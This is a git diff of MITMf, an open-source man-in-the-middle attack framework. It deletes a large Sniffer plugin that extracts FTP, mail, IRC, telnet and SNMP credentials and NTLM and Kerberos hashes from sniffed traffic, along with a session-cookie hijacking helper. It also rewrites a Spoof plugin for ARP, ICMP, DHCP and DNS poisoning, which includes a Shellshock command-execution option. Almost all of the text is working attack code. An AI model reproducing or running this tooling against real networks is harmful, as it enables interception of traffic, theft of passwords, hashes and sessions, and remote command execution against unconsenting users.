- # message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie) - # if self.urlMonitor.isClientLogging() is True: - # self.urlMonitor.writeClientLog(request.client, request.client.headers, message) - # else: - # mitmf_logger.info(message) - - def mallory_server(self): - host = '' - port = 20666 - server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - server.bind((host,port)) - server.listen(1) - while True: - client, addr = server.accept() - if addr[0] != "127.0.0.1": - client.send("Hacked By China!") - client.close() - continue - request = client.recv(8192) - request = request.split('\n') - path = request[0].split()[1] - client.send("HTTP/1.0 200 OK\r\n") - client.send("Content-Type: text/html\r\n\r\n") - if path == "/": - client.send(json.dumps(self.sessions)) - client.close() - - def firefoxdb(self, host, cookie_name, cookie_value, url, ip): - - session_dir=self.save_dir + "/" + ip - cookie_file=session_dir +'/cookies.sqlite' - cookie_file_exists = os.path.exists(cookie_file) - - if (ip not in (self.sql_conns and os.listdir("./logs"))): - - try: - if not os.path.exists(session_dir): - os.makedirs(session_dir) - - db = sqlite3.connect(cookie_file, isolation_level=None) - self.sql_conns[ip] = db.cursor() - - if not cookie_file_exists: - self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))") - self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)") - except Exception, e: - print str(e) - - scheme = urlparse(url).scheme - scheme = (urlparse(url).scheme) - basedomain = self.psl.get_public_suffix(host) - address = urlparse(url).hostname - short_url = scheme + "://"+ address - - log = open(session_dir + '/visited.html','a') - if (ip not in self.seen_hosts): - self.seen_hosts[ip] = {} - log.write(self.html_header) - - if (address not in self.seen_hosts[ip]): - self.seen_hosts[ip][address] = 1 - log.write("\n
\n%s" %(short_url, address)) - - log.close() - - if address == basedomain: - address = "." + address - - expire_date = 2000000000 #Year2033 - now = int(time.time()) - 600 - self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0)) - - def add_options(self, options): - options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies') - options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension') - - def finish(self): - if self.firefox: - print "\n[*] To load a session run: 'firefox -profile logs//visited.html'" \ No newline at end of file diff --git a/plugins/Sniffer.py b/plugins/Sniffer.py deleted file mode 100644 index ca0ba51..0000000 --- a/plugins/Sniffer.py +++ /dev/null @@ -1,815 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -#This is a MITMf port of net-creds https://github.com/DanMcInerney/net-creds - -from plugins.plugin import Plugin -import logging -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) -from scapy.all import * -from sys import exit -from collections import OrderedDict -from StringIO import StringIO -import binascii -import struct -import pcap -import base64 -import threading -import re -import os - -mitmf_logger = logging.getLogger('mitmf') - -class Sniffer(Plugin): - name = "Sniffer" - optname = "sniffer" - desc = "Sniffs for various protocol login and auth attempts" - tree_output = ["Net-Creds online"] - implements = ["sendRequest"] - version = "0.1" - has_opts = False - - def initialize(self, options): - self.options = options - self.interface = options.interface - #self.parse = options.parse - - #these field names were stolen from the etter.fields file (Ettercap Project) - self.http_userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name', - 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', - 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', - 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', - 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in'] - - self.http_passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', - 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password' - 'passwort', 'passwrd', 'wppassword', 'upasswd'] - - if os.geteuid() != 0: 
- sys.exit("[-] Sniffer plugin requires root privileges") - - n = NetCreds() - #if not self.parse: - t = threading.Thread(name="sniffer", target=n.start, args=(self.interface,)) - t.setDaemon(True) - t.start() - - #else: - # pcap = rdpcap(self.parse) - # for pkt in pcap: - # n.pkt_parser(pkt) - - #def add_options(self, options): - # options.add_argument('--parse', dest='parse', type=str, default=None, help='Parse pcap') - - def sendRequest(self, request): - #Capture google searches - if ('google' in request.headers['host']): - if ('search' in request.uri): - self.captureQueries('q', request) - - #Capture bing searches - if ('bing' in request.headers['host']): - if ('Suggestions' in request.uri): - self.captureQueries('qry', request) - - #Capture yahoo searches - if ('search.yahoo' in request.headers['host']): - if ('nresults' in request.uri): - self.captureQueries('command', request) - - self.captureURLCreds(request) - - def captureQueries(self, search_param, request): - try: - for param in request.uri.split('&'): - if param.split('=')[0] == search_param: - query = str(param.split('=')[1]) - if query: - mitmf_logger.info(request.clientInfo + "is querying %s for: %s" % (request.headers['host'], query)) - except Exception, e: - error = str(e) - mitmf_logger.warning(request.clientInfo + "Error parsing search query %s" % error) - - def captureURLCreds(self, request): - ''' - checks for creds passed via GET requests or just in the url - It's surprising to see how many people still do this (please stahp) - ''' - - url = request.uri - - username = None - password = None - for user in self.http_userfields: - #search = re.findall("("+ user +")=([^&|;]*)", request.uri, re.IGNORECASE) - search = re.search('(%s=[^&]+)' % user, url, re.IGNORECASE) - if search: - username = search.group() - - for passw in self.http_passfields: - #search = re.findall("(" + passw + ")=([^&|;]*)", request.uri, re.IGNORECASE) - search = re.search('(%s=[^&]+)' % passw, url, re.IGNORECASE) - if search: - password = search.group() - - if (username and password): - mitmf_logger.warning(request.clientInfo + "Possible Credentials (Method: %s, Host: %s):\n%s" % (request.command, request.headers['host'], url)) - -class NetCreds: - - def __init__(self): - self.pkt_frag_loads = OrderedDict() - self.challenge_acks = OrderedDict() - self.mail_auths = OrderedDict() - self.telnet_stream = OrderedDict() - - # Regexs - self.authenticate_re = '(www-|proxy-)?authenticate' - self.authorization_re = '(www-|proxy-)?authorization' - self.ftp_user_re = r'USER (.+)\r\n' - self.ftp_pw_re = r'PASS (.+)\r\n' - self.irc_user_re = r'NICK (.+?)((\r)?\n|\s)' - self.irc_pw_re = r'NS IDENTIFY (.+)' - self.mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)' - self.mail_auth_re1 = '(\d+ )?login ' - self.NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+' - self.NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+' - - def start(self, interface): - try: - sniff(iface=interface, prn=self.pkt_parser, store=0) - except Exception: - pass - - def frag_remover(self, ack, load): - ''' - Keep the FILO OrderedDict of frag loads from getting too large - 3 points of limit: - Number of ip_ports < 50 - Number of acks per ip:port < 25 - Number of chars in load < 5000 - ''' - - # Keep the number of IP:port mappings below 50 - # last=False pops the oldest item rather than the latest - while len(self.pkt_frag_loads) > 50: - self.pkt_frag_loads.popitem(last=False) - - # Loop through a deep copy dict but modify the original dict - copy_pkt_frag_loads = 
copy.deepcopy(self.pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - if len(copy_pkt_frag_loads[ip_port]) > 0: - # Keep 25 ack:load's per ip:port - while len(copy_pkt_frag_loads[ip_port]) > 25: - self.pkt_frag_loads[ip_port].popitem(last=False) - - # Recopy the new dict to prevent KeyErrors for modifying dict in loop - copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - # Keep the load less than 75,000 chars - for ack in copy_pkt_frag_loads[ip_port]: - # If load > 5000 chars, just keep the last 200 chars - if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: - self.pkt_frag_loads[ip_port][ack] = self.pkt_frag_loads[ip_port][ack][-200:] - - def frag_joiner(self, ack, src_ip_port, load): - ''' - Keep a store of previous fragments in an OrderedDict named pkt_frag_loads - ''' - for ip_port in self.pkt_frag_loads: - if src_ip_port == ip_port: - if ack in self.pkt_frag_loads[src_ip_port]: - # Make pkt_frag_loads[src_ip_port][ack] = full load - old_load = self.pkt_frag_loads[src_ip_port][ack] - concat_load = old_load + load - return OrderedDict([(ack, concat_load)]) - - return OrderedDict([(ack, load)]) - - def pkt_parser(self, pkt): - ''' - Start parsing packets here - ''' - - if pkt.haslayer(Raw): - load = pkt[Raw].load - - # Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control - if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6): - return - - # UDP - if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw): - - src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport) - dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport) - - # SNMP community strings - if pkt.haslayer(SNMP): - self.parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP]) - return - - # Kerberos over UDP - decoded = self.Decode_Ip_Packet(str(pkt)[14:]) - kerb_hash = self.ParseMSKerbv5UDP(decoded['data'][8:]) - if kerb_hash: - self.printer(src_ip_port, dst_ip_port, kerb_hash) - - # TCP - elif pkt.haslayer(TCP) and pkt.haslayer(Raw): - - ack = str(pkt[TCP].ack) - seq = str(pkt[TCP].seq) - src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport) - dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport) - self.frag_remover(ack, load) - self.pkt_frag_loads[src_ip_port] = self.frag_joiner(ack, src_ip_port, load) - full_load = self.pkt_frag_loads[src_ip_port][ack] - - # Limit the packets we regex to increase efficiency - # 750 is a bit arbitrary but some SMTP auth success pkts - # are 500+ characters - if 0 < len(full_load) < 750: - - # FTP - ftp_creds = self.parse_ftp(full_load, dst_ip_port) - if len(ftp_creds) > 0: - for msg in ftp_creds: - self.printer(src_ip_port, dst_ip_port, msg) - return - - # Mail - mail_creds_found = self.mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq) - - # IRC - irc_creds = self.irc_logins(full_load) - if irc_creds != None: - self.printer(src_ip_port, dst_ip_port, irc_creds) - return - - # Telnet - self.telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) - #if telnet_creds != None: - # printer(src_ip_port, dst_ip_port, telnet_creds) - # return - - # HTTP and other protocols that run on TCP + a raw load - self.other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) - - def telnet_logins(self, src_ip_port, dst_ip_port, load, ack, seq): - ''' - Catch telnet logins and passwords - ''' - - msg = None - - if src_ip_port in self.telnet_stream: - # Do a utf decode in case the client sends telnet options before their username - # No one 
would care to see that - try: - self.telnet_stream[src_ip_port] += load.decode('utf8') - except UnicodeDecodeError: - pass - - # \r or \r\n terminate commands in telnet if my pcaps are to be believed - if '\r' in self.telnet_stream[src_ip_port] or '\r\n' in self.telnet_stream[src_ip_port]: - telnet_split = self.telnet_stream[src_ip_port].split(' ', 1) - cred_type = telnet_split[0] - value = telnet_split[1].replace('\r\n', '').replace('\r', '') - # Create msg, the return variable - msg = 'Telnet %s: %s' % (cred_type, value) - del self.telnet_stream[src_ip_port] - self.printer(src_ip_port, dst_ip_port, msg) - - # This part relies on the telnet packet ending in - # "login:", "password:", or "username:" and being <750 chars - # Haven't seen any false+ but this is pretty general - # might catch some eventually - # maybe use dissector.py telnet lib? - if len(self.telnet_stream) > 100: - self.telnet_stream.popitem(last=False) - mod_load = load.lower().strip() - if mod_load.endswith('username:') or mod_load.endswith('login:'): - self.telnet_stream[dst_ip_port] = 'username ' - elif mod_load.endswith('password:'): - self.telnet_stream[dst_ip_port] = 'password ' - - def ParseMSKerbv5TCP(self, Data): - ''' - Taken from Pcredz because I didn't want to spend the time doing this myself - I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel? - Maybe replace this eventually with the kerberos python lib - Parses Kerberosv5 hashes from packets - ''' - try: - MsgType = Data[21:22] - EncType = Data[43:44] - MessageType = Data[32:33] - except IndexError: - return - - if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02": - if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33": - HashLen = struct.unpack(' 1: - lines = full_load.count('\r\n') - if lines > 1: - full_load = full_load.split('\r\n')[-2] # -1 is '' - return full_load - - def parse_ftp(self, full_load, dst_ip_port): - ''' - Parse out FTP creds - ''' - print_strs = [] - - # Sometimes FTP packets double up on the authentication lines - # We just want the lastest one. 
Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n" - full_load = self.double_line_checker(full_load, 'USER') - - # FTP and POP potentially use idential client > server auth pkts - ftp_user = re.match(self.ftp_user_re, full_load) - ftp_pass = re.match(self.ftp_pw_re, full_load) - - if ftp_user: - msg1 = 'FTP User: %s' % ftp_user.group(1).strip() - print_strs.append(msg1) - if dst_ip_port[-3:] != ':21': - msg2 = 'Nonstandard FTP port, confirm the service that is running on it' - print_strs.append(msg2) - - elif ftp_pass: - msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip() - print_strs.append(msg1) - if dst_ip_port[-3:] != ':21': - msg2 = 'Nonstandard FTP port, confirm the service that is running on it' - print_strs.append(msg2) - - return print_strs - - def mail_decode(self, src_ip_port, dst_ip_port, mail_creds): - ''' - Decode base64 mail creds - ''' - try: - decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8') - decoded = decoded.replace('\x00', ' ') - except TypeError: - decoded = None - except UnicodeDecodeError as e: - decoded = None - - if decoded != None: - msg = 'Decoded: %s' % decoded - self.printer(src_ip_port, dst_ip_port, msg) - - def mail_logins(self, full_load, src_ip_port, dst_ip_port, ack, seq): - ''' - Catch IMAP, POP, and SMTP logins - ''' - # Handle the first packet of mail authentication - # if the creds aren't in the first packet, save it in mail_auths - - # mail_auths = 192.168.0.2 : [1st ack, 2nd ack...] - - found = False - - # Sometimes mail packets double up on the authentication lines - # We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n" - full_load = self.double_line_checker(full_load, 'auth') - - # Client to server 2nd+ pkt - if src_ip_port in self.mail_auths: - if seq in self.mail_auths[src_ip_port][-1]: - stripped = full_load.strip('\r\n') - try: - decoded = base64.b64decode(stripped) - msg = 'Mail authentication: %s' % decoded - self.printer(src_ip_port, dst_ip_port, msg) - except TypeError: - pass - self.mail_auths[src_ip_port].append(ack) - - # Server responses to client - # seq always = last ack of tcp stream - elif dst_ip_port in self.mail_auths: - if seq in self.mail_auths[dst_ip_port][-1]: - # Look for any kind of auth failure or success - a_s = 'Authentication successful' - a_f = 'Authentication failed' - # SMTP auth was successful - if full_load.startswith('235') and 'auth' in full_load.lower(): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_s) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # SMTP failed - elif full_load.startswith('535 '): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_f) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # IMAP/POP/SMTP failed - elif ' fail' in full_load.lower(): - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_f) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - # IMAP auth success - elif ' OK [' in full_load: - # Reversed the dst and src - self.printer(dst_ip_port, src_ip_port, a_s) - found = True - try: - del self.mail_auths[dst_ip_port] - except KeyError: - pass - - # Pkt was not an auth pass/fail so its just a normal server ack - # that it got the client's first auth pkt - else: - if len(self.mail_auths) > 100: - self.mail_auths.popitem(last=False) - self.mail_auths[dst_ip_port].append(ack) - - # Client to server but it's a new TCP seq - # This handles most POP/IMAP/SMTP logins but there's at least 
one edge case - else: - mail_auth_search = re.match(self.mail_auth_re, full_load, re.IGNORECASE) - if mail_auth_search != None: - auth_msg = full_load - # IMAP uses the number at the beginning - if mail_auth_search.group(1) != None: - auth_msg = auth_msg.split()[1:] - else: - auth_msg = auth_msg.split() - # Check if its a pkt like AUTH PLAIN dvcmQxIQ== - # rather than just an AUTH PLAIN - if len(auth_msg) > 2: - mail_creds = ' '.join(auth_msg[2:]) - msg = 'Mail authentication: %s' % mail_creds - self.printer(src_ip_port, dst_ip_port, msg) - - self.mail_decode(src_ip_port, dst_ip_port, mail_creds) - try: - del self.mail_auths[src_ip_port] - except KeyError: - pass - found = True - - # Mail auth regex was found and src_ip_port is not in mail_auths - # Pkt was just the initial auth cmd, next pkt from client will hold creds - if len(self.mail_auths) > 100: - self.mail_auths.popitem(last=False) - self.mail_auths[src_ip_port] = [ack] - - # At least 1 mail login style doesn't fit in the original regex: - # 1 login "username" "password" - # This also catches FTP authentication! - # 230 Login successful. - elif re.match(self.mail_auth_re1, full_load, re.IGNORECASE) != None: - - # FTP authentication failures trigger this - #if full_load.lower().startswith('530 login'): - # return - - auth_msg = full_load - auth_msg = auth_msg.split() - if 2 < len(auth_msg) < 5: - mail_creds = ' '.join(auth_msg[2:]) - msg = 'Authentication: %s' % mail_creds - self.printer(src_ip_port, dst_ip_port, msg) - self.mail_decode(src_ip_port, dst_ip_port, mail_creds) - found = True - - if found == True: - return True - - def irc_logins(self, full_load): - ''' - Find IRC logins - ''' - user_search = re.match(self.irc_user_re, full_load) - pass_search = re.match(self.irc_pw_re, full_load) - if user_search: - msg = 'IRC nick: %s' % user_search.group(1) - return msg - if pass_search: - msg = 'IRC pass: %s' % pass_search.group(1) - self.printer(src_ip_port, dst_ip_port, msg) - return pass_search - - def headers_to_dict(self, header_lines): - ''' - Convert the list of header lines into a dictionary - ''' - headers = {} - # Incomprehensible list comprehension flattens list of headers - # that are each split at ': ' - # http://stackoverflow.com/a/406296 - headers_list = [x for line in header_lines for x in line.split(': ', 1)] - headers_dict = dict(zip(headers_list[0::2], headers_list[1::2])) - # Make the header key (like "Content-Length") lowercase - for header in headers_dict: - headers[header.lower()] = headers_dict[header] - - return headers - - def parse_http_load(self, full_load, http_methods): - ''' - Split the raw load into list of headers and body string - ''' - try: - headers, body = full_load.split("\r\n\r\n", 1) - except ValueError: - headers = full_load - body = '' - header_lines = headers.split("\r\n") - - # Pkts may just contain hex data and no headers in which case we'll - # still want to parse them for usernames and password - http_line = self.get_http_line(header_lines, http_methods) - if not http_line: - headers = '' - body = full_load - - header_lines = [line for line in header_lines if line != http_line] - - return http_line, header_lines, body - - def get_http_line(self, header_lines, http_methods): - ''' - Get the header with the http command - ''' - for header in header_lines: - for method in http_methods: - # / is the only char I can think of that's in every http_line - # Shortest valid: "GET /", add check for "/"? 
- if header.startswith(method): - http_line = header - return http_line - - - def other_parser(self, src_ip_port, dst_ip_port, full_load, ack, seq, pkt): - - #For now we will parse the HTTP headers through scapy and not through Twisted - #This will have to get changed in the future, seems a bit redundent - http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] - http_line, header_lines, body = self.parse_http_load(full_load, http_methods) - headers = self.headers_to_dict(header_lines) - - # Kerberos over TCP - decoded = self.Decode_Ip_Packet(str(pkt)[14:]) - kerb_hash = self.ParseMSKerbv5TCP(decoded['data'][20:]) - if kerb_hash: - self.printer(src_ip_port, dst_ip_port, kerb_hash) - - # Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL) - NTLMSSP2 = re.search(self.NTLMSSP2_re, full_load, re.DOTALL) - NTLMSSP3 = re.search(self.NTLMSSP3_re, full_load, re.DOTALL) - if NTLMSSP2: - self.parse_ntlm_chal(NTLMSSP2.group(), ack) - if NTLMSSP3: - ntlm_resp_found = self.parse_ntlm_resp(NTLMSSP3.group(), seq) - if ntlm_resp_found != None: - self.printer(src_ip_port, dst_ip_port, ntlm_resp_found) - - # Look for authentication headers - if len(headers) == 0: - authenticate_header = None - authorization_header = None - for header in headers: - authenticate_header = re.match(self.authenticate_re, header) - authorization_header = re.match(self.authorization_re, header) - if authenticate_header or authorization_header: - break - - if authorization_header or authenticate_header: - # NETNTLM - netntlm_found = self.parse_netntlm(authenticate_header, authorization_header, headers, ack, seq) - if netntlm_found != None: - self.printer(src_ip_port, dst_ip_port, netntlm_found) - - def parse_netntlm(self, authenticate_header, authorization_header, headers, ack, seq): - ''' - Parse NTLM hashes out - ''' - # Type 2 challenge from server - if authenticate_header != None: - chal_header = authenticate_header.group() - self.parse_netntlm_chal(headers, chal_header, ack) - - # Type 3 response from client - elif authorization_header != None: - resp_header = authorization_header.group() - msg = self.parse_netntlm_resp_msg(headers, resp_header, seq) - if msg != None: - return msg - - def parse_snmp(self, src_ip_port, dst_ip_port, snmp_layer): - ''' - Parse out the SNMP version and community string - ''' - if type(snmp_layer.community.val) == str: - ver = snmp_layer.version.val - msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val) - self.printer(src_ip_port, dst_ip_port, msg) - return True - - def parse_netntlm_chal(self, headers, chal_header, ack): - ''' - Parse the netntlm server challenge - https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py - ''' - header_val2 = headers[chal_header] - header_val2 = header_val2.split(' ', 1) - # The header value can either start with NTLM or Negotiate - if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate': - msg2 = header_val2[1] - msg2 = base64.decodestring(msg2) - self.parse_ntlm_chal(ack, msg2) - - def parse_ntlm_chal(self, msg2, ack): - ''' - Parse server challenge - ''' - - Signature = msg2[0:8] - msg_type = struct.unpack(" 50: - self.challenge_acks.popitem(last=False) - self.challenge_acks[ack] = ServerChallenge - - def parse_netntlm_resp_msg(self, headers, resp_header, seq): - ''' - Parse the client response to the challenge - ''' - header_val3 = headers[resp_header] - header_val3 = header_val3.split(' ', 1) - - # The header value can either start with NTLM or Negotiate - if 
header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate': - msg3 = base64.decodestring(header_val3[1]) - return self.parse_ntlm_resp(msg3, seq) - - def parse_ntlm_resp(self, msg3, seq): - ''' - Parse the 3rd msg in NTLM handshake - Thanks to psychomario - ''' - - if seq in self.challenge_acks: - challenge = self.challenge_acks[seq] - else: - challenge = 'CHALLENGE NOT FOUND' - - if len(msg3) > 43: - # Thx to psychomario for below - lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44]) - lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen]) - nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen]) - domain = msg3[domoff:domoff+domlen].replace("\0", "") - user = msg3[useroff:useroff+userlen].replace("\0", "") - # Original check by psychomario, might be incorrect? - #if lmhash != "0"*48: #NTLMv1 - if ntlen == 24: #NTLMv1 - msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge) - return msg - elif ntlen > 60: #NTLMv2 - msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:]) - return msg - - def printer(self, src_ip_port, dst_ip_port, msg): - if dst_ip_port != None: - print_str = '%s --> %s %s' % (src_ip_port, dst_ip_port,msg) - # All credentials will have dst_ip_port, URLs will not - mitmf_logger.info(print_str) - else: - print_str = '%s %s' % (src_ip_port.split(':')[0], msg) - mitmf_logger.info(print_str) diff --git a/plugins/Spoof.py b/plugins/Spoof.py index 0712dc7..148e84c 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -19,111 +19,122 @@ # import logging -import sys +from sys import exit from core.utils import SystemConfig, IpTables -from core.sslstrip.DnsCache import DnsCache -from core.wrappers.protocols import _ARP, _DHCP, _ICMP +from core.protocols.arp.ARPpoisoner import ARPpoisoner +from core.protocols.arp.ARPWatch import ARPWatch +from core.dnschef.DNSchef import DNSChef +from core.protocols.dhcp.DHCPServer import DHCPServer +from core.protocols.icmp.ICMPpoisoner import ICMPpoisoner from plugins.plugin import Plugin -from core.dnschef.dnschef import DNSChef - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy from scapy.all import * class Spoof(Plugin): - name = "Spoof" - optname = "spoof" - desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS" - version = "0.6" - has_opts = True + name = "Spoof" + optname = "spoof" + desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS" + tree_output = list() + version = "0.6" + has_opts = True - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.dnscfg = options.configfile['MITMf']['DNS'] - self.dhcpcfg = options.configfile['Spoof']['DHCP'] - self.target = options.target - self.manualiptables = options.manualiptables - self.protocolInstances = [] + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + self.dnscfg = self.config['MITMf']['DNS'] + self.dhcpcfg = self.config['Spoof']['DHCP'] + self.targets = options.targets + self.manualiptables = options.manualiptables + self.mymac = SystemConfig.getMAC(options.interface) + self.myip = SystemConfig.getIP(options.interface) + self.protocolInstances = [] - #Makes scapy more verbose - debug = False - if options.log_level is 'debug': - debug = True + #Makes scapy more verbose + debug = False + if options.log_level == 'debug': + debug = 
True - if options.arp: + if options.arp: - if not options.gateway: - sys.exit("[-] --arp argument requires --gateway") + if not options.gateway: + exit("[-] --arp argument requires --gateway") - arp = _ARP(options.gateway, options.interface, options.mac_address) - arp.target = options.target - arp.arpmode = options.arpmode - arp.debug = debug + if options.targets is None: + #if were poisoning whole subnet, start ARP-Watch + arpwatch = ARPWatch(options.gateway, self.myip, options.interface) + arpwatch.debug = debug - self.protocolInstances.append(arp) + self.tree_output.append("ARPWatch online") + self.protocolInstances.append(arpwatch) - elif options.icmp: + arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets) + arp.arpmode = options.arpmode + arp.debug = debug - if not options.gateway: - sys.exit("[-] --icmp argument requires --gateway") + self.protocolInstances.append(arp) - if not options.target: - sys.exit("[-] --icmp argument requires --target") - icmp = _ICMP(options.interface, options.target, options.gateway, options.ip_address) - icmp.debug = debug + elif options.icmp: - self.protocolInstances.append(icmp) + if not options.gateway: + exit("[-] --icmp argument requires --gateway") - elif options.dhcp: + if not options.targets: + exit("[-] --icmp argument requires --targets") - if options.target: - sys.exit("[-] --target argument invalid when DCHP spoofing") + icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, options.ip_address) + icmp.debug = debug - dhcp = _DHCP(options.interface, self.dhcpcfg, options.ip_address, options.mac_address) - dhcp.shellshock = options.shellshock - dhcp.debug = debug - self.protocolInstances.append(dhcp) + self.protocolInstances.append(icmp) - if options.dns: + elif options.dhcp: - if not options.manualiptables: - if IpTables.getInstance().dns is False: - IpTables.getInstance().DNS(options.ip_address, self.dnscfg['port']) + if options.targets: + exit("[-] --targets argument invalid when DCHP spoofing") - DNSChef.getInstance().loadRecords(self.dnscfg) + dhcp = DHCPServer(options.interface, self.dhcpcfg, options.ip_address, options.mac_address) + dhcp.shellshock = options.shellshock + dhcp.debug = debug + self.protocolInstances.append(dhcp) - if not options.arp and not options.icmp and not options.dhcp and not options.dns: - sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") + if options.dns: - SystemConfig.setIpForwarding(1) + if not options.manualiptables: + if IpTables.getInstance().dns is False: + IpTables.getInstance().DNS(self.myip, self.dnscfg['port']) - if not options.manualiptables: - if IpTables.getInstance().http is False: - IpTables.getInstance().HTTP(options.listen) + DNSChef.getInstance().loadRecords(self.dnscfg) - for protocol in self.protocolInstances: - protocol.start() + if not options.arp and not options.icmp and not options.dhcp and not options.dns: + exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns") - def add_options(self, options): - group = options.add_mutually_exclusive_group(required=False) - group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing') - group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') - group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') - options.add_argument('--dns', dest='dns', action='store_true', default=False, 
help='Proxy/Modify DNS queries') - options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') - options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') - options.add_argument('--target', dest='target', default=None, help='Specify a host to poison [default: subnet]') - options.add_argument('--arpmode',type=str, dest='arpmode', default='req', choices=["req", "rep"], help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]') - #options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning') + SystemConfig.setIpForwarding(1) - def finish(self): - for protocol in self.protocolInstances: - if hasattr(protocol, 'stop'): - protocol.stop() + if not options.manualiptables: + IpTables.getInstance().Flush() + if IpTables.getInstance().http is False: + IpTables.getInstance().HTTP(options.listen) - if not self.manualiptables: - 